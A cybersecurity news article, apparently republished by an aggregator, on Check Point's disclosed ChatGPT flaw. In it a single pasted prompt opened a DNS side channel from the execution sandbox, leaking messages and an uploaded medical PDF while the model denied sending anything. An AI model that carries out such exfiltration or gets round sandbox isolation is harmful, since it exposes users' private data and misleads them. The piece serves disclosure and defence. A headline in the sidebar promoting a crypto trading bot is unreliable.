LIVE NEWS
  • The Strait of Hormuz offers a lesson in air denial
  • Scientists discover hidden “winds” inside cells that could explain cancer spread
  • Cape Town’s Housing Problem – The New York Times
  • Whales quietly switched to ConfluxCapital’s automated quantitative trading robot platform to avoid losses, and earn $19,700 daily
  • Google fixes Chrome zero-day with in-the-wild exploit (CVE-2026-5281)
  • Gas crosses $4 a gallon in the U.S. for the first time in 3 years : NPR
  • Zelenskyy’s Gulf region tour was a masterclass in wartime diplomacy
  • After Iran, gold is looking less glittery
Prime Reports
  • Home
  • Popular Now
  • Crypto
  • Cybersecurity
  • Economy
  • Geopolitics
  • Global Markets
  • Politics
  • See More
    • Artificial Intelligence
    • Climate Risks
    • Defense
    • Healthcare Innovation
    • Science
    • Technology
    • World
Prime Reports
  • Home
  • Popular Now
  • Crypto
  • Cybersecurity
  • Economy
  • Geopolitics
  • Global Markets
  • Politics
  • Artificial Intelligence
  • Climate Risks
  • Defense
  • Healthcare Innovation
  • Science
  • Technology
  • World
Home»Cybersecurity»ChatGPT Security Issue Enabled Data Theft via Single Prompt
Cybersecurity

ChatGPT Security Issue Enabled Data Theft via Single Prompt

primereportsBy primereportsMarch 31, 2026No Comments3 Mins Read
Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
ChatGPT Security Issue Enabled Data Theft via Single Prompt
Share
Facebook Twitter LinkedIn Pinterest Email


A security vulnerability in ChatGPT executed with a single malicious prompt could be exploited to covertly exfiltrate sensitive data from prompts and messages.

The security issue, which enabled data exfiltration and remote code execution, was discovered by cybersecurity researchers at Check Point, who warned it could put user privacy at risk.

“A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content,” Check Point said in a blog post published on March 30.

A security update for ChatGPT was deployed on February 20 after researchers reported the issue to OpenAI.

Prior to the fix, a hidden outbound communication path from ChatGPT’s isolated execution runtime to the public internet could have put users at risk of having their messages and prompts exposed.

Many people have become accustomed ChatGPT and other AI assistants to help more efficiently manage tasks at work. This includes those which involve sensitive corporate data, including account details and private records.

LLMs are also being used to discuss personal issues, like their health, personal finances or mental wellbeing.

Users expect this information to remain within the system, protected from exfiltration by appropriate guardrails. However, Check Point found that it was possible to bypass these protections.

“We found that a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation,” said researchers.

The vulnerability allowed for information to be transmitted to an external server through a DNS side channel originating from the container used by ChatGPT.

Key to the issue was how the model operated under the assumption that this environment was not designed to send data outward, so when the model was promoted to send data, it did not know how to mediate or resist this.  

An attacker could take advantage of this by using the prompt and directing ChatGPT to send information exchanged with the model outside the framework to access it themselves.

Third-Party Access to Private Prompts

In a proof-of-concept Check Point uploaded a PDF containing laboratory test results, which also contained personal information, including a patient name and used the malicious prompt to exploit the vulnerability.

When asked if the information was sent to a third-party, ChatGPT responded that it had not, seemingly unaware that because of its actions a server operated by the attacker received highly sensitive data extracted from the conversation.

The vulnerability was based around the user entering the prompt themselves. The researchers pointed out that there are multiple ways to trick users into entering commands, for example, by listing the malicious prompt on a website or social media thread about the top prompts for productivity and other terms people may search for.

“For many users, copying and pasting such prompts into a new conversation is routine and does not appear risky,” said researchers.

“A malicious prompt distributed in that format could therefore be presented as a harmless productivity aid and interpreted as just another useful trick for getting better results from the assistant.”

While it’s unknown if this vulnerability was exploited in the wild, Check Point researchers warned that as AI assistants like ChatGPT are increasingly operating in environments which may as involve sensitive data, security must be a priority.

“As AI tools become more powerful and widely used, security must remain a central consideration. These systems offer enormous benefits, but adopting them safely requires careful attention to every layer of the platform,” the blog post concluded.

Infosecurity has contacted OpenAI for comment.

Image credit: Anton Dzhumelia / Shutterstock.com

Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
Previous ArticleHuawei’s cloud computing revenue dropped in 2025 as Chinese AI lagged U.S. rivals
Next Article BTC spikes about 1% higher on hope for end to Iran conflict
primereports
  • Website

Related Posts

Cybersecurity

Google fixes Chrome zero-day with in-the-wild exploit (CVE-2026-5281)

April 1, 2026
Cybersecurity

Attack on axios software developer tool threatens widespread compromises

March 31, 2026
Cybersecurity

5 HSA/FSA eligible gadgets that are on sale now

March 31, 2026
Add A Comment
Leave A Reply Cancel Reply

Top Posts

Global Resources Outlook 2024 | UNEP

December 6, 20257 Views

The D Brief: DHS shutdown likely; US troops leave al-Tanf; CNO’s plea to industry; Crowded robot-boat market; And a bit more.

February 14, 20264 Views

German Chancellor Merz faces difficult mission to Israel – DW – 12/06/2025

December 6, 20254 Views
Stay In Touch
  • Facebook
  • YouTube
  • TikTok
  • WhatsApp
  • Twitter
  • Instagram
Latest Reviews

Subscribe to Updates

Get the latest tech news from FooBar about tech, design and biz.

PrimeReports.org
Independent global news, analysis & insights.

PrimeReports.org brings you in-depth coverage of geopolitics, markets, technology and risk – with context that helps you understand what really matters.

Editorially independent · Opinions are those of the authors and not investment advice.
Facebook X (Twitter) LinkedIn YouTube
Key Sections
  • World
  • Geopolitics
  • Popular Now
  • Artificial Intelligence
  • Cybersecurity
  • Crypto
All Categories
  • Artificial Intelligence
  • Climate Risks
  • Crypto
  • Cybersecurity
  • Defense
  • Economy
  • Geopolitics
  • Global Markets
  • Healthcare Innovation
  • Politics
  • Popular Now
  • Science
  • Technology
  • World
  • About Us
  • Contact Us
  • Privacy Policy
  • Terms & Conditions
  • Disclaimer
  • Cookie Policy
  • DMCA / Copyright Notice
  • Editorial Policy

Sign up for Prime Reports Briefing – essential stories and analysis in your inbox.

By subscribing you agree to our Privacy Policy. You can opt out anytime.
Latest Stories
  • The Strait of Hormuz offers a lesson in air denial
  • Scientists discover hidden “winds” inside cells that could explain cancer spread
  • Cape Town’s Housing Problem – The New York Times
© 2026 PrimeReports.org. All rights reserved.
Privacy Terms Contact

Type above and press Enter to search. Press Esc to cancel.